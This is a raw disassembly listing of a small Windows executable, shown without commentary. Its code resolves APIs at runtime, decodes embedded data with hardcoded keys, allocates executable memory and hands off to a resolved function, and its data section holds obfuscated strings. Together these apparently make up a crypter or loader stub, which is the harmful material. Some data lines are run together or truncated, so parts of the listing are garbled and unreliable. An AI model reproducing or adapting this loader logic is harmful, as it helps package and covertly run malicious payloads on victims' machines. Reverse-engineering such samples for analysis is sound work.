call ds:FreeLibrary ; FreeLibrary
xor al, al
loc_401BAB: ; CODE XREF: sub_401877+329�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_401877 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BB1 proc near ; CODE XREF: sub_401BF5+CB�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_C]
imul esi, 64h
push edi
inc esi
push esi ; dwBytes
call sub_401000
mov edi, eax
test edi, edi
pop ecx
jz short loc_401BF1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push 2
call dword_40329C
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push esi
push edi
push 2
call dword_4032C4
mov eax, edi
loc_401BF1: ; CODE XREF: sub_401BB1+19�j
pop edi
pop esi
leave
retn
sub_401BB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BF5 proc near ; CODE XREF: start+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call dword_4032A0
push ebx
push eax
mov dword_403284, eax
call dword_403298
mov dword_4312C4, eax
inc eax
push eax ; dwBytes
call sub_401000
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
push dword_4312C4
mov dword_403274, eax
push eax
push dword_403284
call dword_4032E0
push [ebp+var_4]
call sub_4017C0
mov edx, [ebp+var_4]
mov eax, dword_40326C
pop ecx
xor ecx, ecx
sub edx, eax
jz short loc_401C87
loc_401C64: ; CODE XREF: sub_401BF5+90�j
mov edx, dword_403274
add eax, edx
mov al, [eax+ecx]
mov edx, dword_4312A8
mov [edx+ecx], al
mov edx, [ebp+var_4]
mov eax, dword_40326C
inc ecx
sub edx, eax
cmp ecx, edx
jb short loc_401C64
loc_401C87: ; CODE XREF: sub_401BF5+6D�j
mov ecx, dword_4312A8
sub ecx, eax
mov eax, [ebp+var_4]
mov [ecx+eax], bl
mov eax, [ebp+var_4]
sub eax, dword_40326C
push eax
push dword_4312A8
push offset a786jy44yhr ; "786jy44yhr"
call sub_40102B
lea ecx, [ebp+var_8]
push ecx
mov ecx, [ebp+var_4]
sub ecx, dword_40326C
push ecx
push ebx
push eax
push ebx
call sub_401BB1
push [ebp+var_8]
push eax
push offset a9k54hr3tre ; "9k54hr3tre"
call sub_40102B
add esp, 2Ch
mov dword_40326C, ebx
mov dword_403274, eax
pop ebx
leave
retn
sub_401BF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_524 = byte ptr -524h
var_258 = byte ptr -258h
var_158 = byte ptr -158h
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
push edi
call sub_401877
call sub_4017D8
test al, al
jnz loc_401E37
push 100h
lea eax, [ebp+var_258]
push eax
xor ebx, ebx
push ebx
call dword_4032F0
lea eax, [ebp+var_258]
push eax
push ebx
call sub_401BF5
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_401160
add esp, 18h
test al, al
jz loc_401E37
push [ebp+var_8]
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_40132F
add esp, 10h
push 40h
push 1000h
push eax
push ebx
mov [ebp+var_4], eax
call dword_4032D0
push eax
push [ebp+var_8]
mov dword_4312B0, eax
lea eax, [ebp+var_158]
push eax
push ebx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_4013A5
push ebx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_524]
push eax
push ebx
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_258]
push eax
call sub_40159B
add esp, 30h
push [ebp+var_C]
mov ecx, 0B3h
push [ebp+var_10]
lea esi, [ebp+var_524]
sub esp, 2CCh
mov edi, esp
sub esp, 10h
rep movsd
mov edi, esp
lea eax, [ebp+var_258]
push eax
push [ebp+var_4]
lea esi, [ebp+var_38]
push dword_4312B0
movsd
push [ebp+var_8]
movsd
lea eax, [ebp+var_158]
push eax
push ebx
lea eax, [ebp+var_28]
movsd
push eax
lea eax, [ebp+var_78]
push eax
movsd
call sub_401656
add esp, 304h
push ebx
push [ebp+var_4]
push dword_4312B0
push dword_4312C8
push dword_4312B8
call dword_4032E4
push [ebp+var_4]
test eax, eax
setnz al
push ebx
mov byte_4312BC, al
call sub_4017AC
pop ecx
pop ecx
loc_401E37: ; CODE XREF: start+18�j start+5D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
start endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000000B8 ( 184.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00001400
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401877+32C�p
; DATA XREF: sub_401877+32C�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401877+69�p
; sub_401877+82�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401877+21�p
; sub_401877+36�p ...
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_401000+8�p
; DATA XREF: sub_401000+8�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 402010h
dd 0
dword_402014 dd 30h a9k54hr3tre db '9k54hr3tre',0 ; DATA XREF: sub_401BF5+D4�o
align 4
a786jy44yhr db '786jy44yhr',0 ; DATA XREF: sub_401BF5+B0�o
align 10h
db 'X ',0
align 4
dd 2 dup(0)
dd 20AAh, 2000h, 5 dup(0)
dd 207Ah, 2088h, 209Ah, 206Ch, 0
dd 6C4701EEh, 6C61626Fh, 6F6C6C41h, 0EF0063h, 65657246h
dd 7262694Ch, 797261h, 65470198h, 6F725074h, 64644163h
dd 73736572h, 2480000h, 64616F4Ch, 7262694Ch, 41797261h
dd 454B0000h, 4C454E52h, 642E3233h, 6C6Ch, 52h dup(0)
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 0002E2CC ( 189132.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00001600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
dword_403000 dd 4FB47895h, 0F67297DDh, 739E72EFh, 55107358h, 19DB44h
; DATA XREF: sub_4017D8+22�o
dword_403014 dd 4FA87E80h, 977299DAh, 759F7FD3h, 0dword_403024 dd 4FA87E80h, 977299DAh, 759F7FD3h, 5771haSrovKUszqaWts db 'rvkUzQa<WT',0 ; DATA XREF: sub_401877+1EA�o
align 4
dword_403048 dd 558F608Ch, 806E99C2h, 598776D6h, 59387C52h, 0D713C145h
; DATA XREF: sub_401877+BB�o
dd 0
aReUsDAi db 'e^|a',0
aXeZAndPxegn db 'eZNpeGn',0 ; DATA XREF: sub_401877+D4�o
align 4
aRiuFFswZ db 'rUʔ-wz',0 ; DATA XREF: sub_401877+25�o
align 4
aSrooKPqx@jN db 'roNJ{Px@J%N',0 ; DATA XREF: sub_401877+183�o
align 10h
dword_4030A0 dd 5FBB7284h, 0B5718AFFh, 5B8360DAh, 48324251h, 48h
; DATA XREF: sub_401877+1B8�o
aDrJAlpsrCqj db 'rjڝlrcQj%{',0 ; DATA XREF: sub_401877+19C�o
align 4
dword_4030C8 dd 4FA87E80h, 867299DAh, 73847CCDh, 42185B57h, 0
; DATA XREF: sub_401877+21F�o
aBeOIlVgeyj0uc db 'eOʨlveyJ0UC',0 ; DATA XREF: sub_401877+86�o
align 10h
aEKtckeQeb@@3i db '`KkQb@@3I',0 ; DATA XREF: sub_4017D8+60�o
align 4
aErooKPqx@jN db 'roNJ{Px@J%N',0 ; DATA XREF: sub_401877+138�o
align 4
dword_403118 dd 7A8C5397h, 0E42DB1FFh, 7A9C7791h, 0aDrinAjVsr db 'rNJvr',0 ; DATA XREF: sub_401877+ED�o
align 4
dd 56A87282h, 0A27F96C6h, 798243DAh, 492E4A57h, 0
aAIoSrrVx db '~Oڙrv',0
aEroFJZubq db 'r}Ɣ{zbQ]',0
align 4
aE db '{^',0
align 10h
dd 48B57B95h, 0B87FB0CAh, 957FDBh, 77AE7291h, 0BA7F9BC0h
dd 739D7AEBh, 0
aCWZ db 'cWz',0 ; DATA XREF: sub_401877+7�o
align 4
dd 77AE7285h, 0BA7F9BC0h, 739D7AEBh, 0
dword_4031A8 dd 7FB66384h, 0BB719BCAh, 659561CFh, 5C286D47h, 0ECD57h
; DATA XREF: sub_401877+251�o
aXeZAxV db 'eZXv',0 ; DATA XREF: sub_401877+11F�o
aDr_ssr db 'r_r',0 ; DATA XREF: sub_401877+16A�o
align 4
dword_4031D4 dd 7CB66384h, 0B95D8CCAh, 738263D2h, 55345C47h, 0CB13FF5Fh
; DATA XREF: sub_401877+151�o
dd 0FF2D5129h, 8906302Ah, 0B40Ah
aSroFEIx db 'r}Ɣ{i',0 ; DATA XREF: sub_401877+238�o
aDcXXndGtai_c db 'cxn`TAI;_C',0 ; DATA XREF: sub_401877+4F�o
align 4
aSronAlsXw db 'rnܝl~W',0
align 4
aDrTApaJ db 'rtߝpj',0 ; DATA XREF: sub_401877+203�o
aSmzSFswZ db 'sZߑ-wz',0
align 10h
dword_403240 dd 78BD7284h, 0B36D97C3h, 8976F4haAIoSrzVvoqw db '~OڙrvoqW',0 ; DATA XREF: sub_401877+1D1�o
align 4
aKqowdsv3t35s db 'kqowdsv3t35s',0 ; DATA XREF: sub_4017D8+27�o
; sub_401877+C�o
align 4
dword_40326C dd 1A00h ; sub_401160+9C�r ...
byte_403270 db 0 ; DATA XREF: sub_401160+4B�w
; sub_4013A5+2F�w ...
align 4
dword_403274 dd 0 ; sub_401160+9�r ...
dword_403278 dd 0 ; sub_401877+10C�w ...
dword_40327C dd 0 ; sub_401656+A5�r ...
dword_403280 dd 0 ; sub_401877+C1�w ...
dword_403284 dd 0 ; sub_401BF5+4C�r
dword_403288 dd 0 ; sub_401877+DA�w ...
dword_40328C dd 0 ; sub_401877+1D7�w ...
byte_403290 db 0 ; DATA XREF: sub_401160+1A�w
; sub_401160+45�w ...
align 4
dword_403294 dd 0 ; sub_4017AC�r
dword_403298 dd 0 ; sub_401877+2C3�r ...
dword_40329C dd 0 ; sub_401877+31F�r ...
dword_4032A0 dd 0 ; sub_401877+2BB�r ...
dword_4032A4 dd 3 dup(0) dword_4032B0 dd 0 dword_4032B4 dd 0 align 10h
dword_4032C0 dd 0 ; sub_401877+313�r
dword_4032C4 dd 0 ; sub_401BB1+38�r
align 10h
dword_4032D0 dd 0 ; sub_401877+26A�r ...
dword_4032D4 dd 0 ; sub_401877+225�w ...
dword_4032D8 dd 0 ; sub_401877+1A2�w ...
dword_4032DC dd 0 dword_4032E0 dd 0 ; sub_401877+2CB�r ...
dword_4032E4 dd 0 ; sub_401877+A5�w ...
byte_4032E8 db 0 ; DATA XREF: sub_401160+2A�w
; sub_401160+33�w ...
align 4
dword_4032EC dd 0 ; sub_401877+157�w ...
dword_4032F0 dd 0 ; sub_401877+2F3�r ...
align 8
byte_4032F8 db 0 ; DATA XREF: sub_40113B+17�w
; sub_401160+87�o ...
dword_4032F9 dd 0 ; sub_401160+C3�r ...
align 10h
dd 4 dup(0)
byte_403310 db 0 ; DATA XREF: sub_401160+B4�w
align 4
dd 9 dup(0)
byte_403338 db 0 ; DATA XREF: sub_401160+63�w
align 4
dd 27h dup(0)
byte_4033D8 db 0 ; DATA XREF: sub_401160+103�w
align 4
dd 9 dup(0)
dd 0B7A8h dup(?)
dword_4312A0 dd ? ; sub_401877+1F0�w ...
dword_4312A4 dd ? dword_4312A8 dd ? ; sub_401BF5+7A�r ...
dword_4312AC dd ? ; sub_401877+F3�w ...
dword_4312B0 dd ? dword_4312B4 dd ? ; sub_401877+23E�w ...
dword_4312B8 dd ? ; start+132�r
byte_4312BC db ? ; DATA XREF: sub_4017AC+6�w start+147�w
align 10h
dword_4312C0 dd ? ; sub_401877+1BE�w ...
dword_4312C4 dd ? ; sub_401BF5+2E�w ...
dword_4312C8 dd ? ; sub_401656+7F�w ...
align 200h
_data ends
end start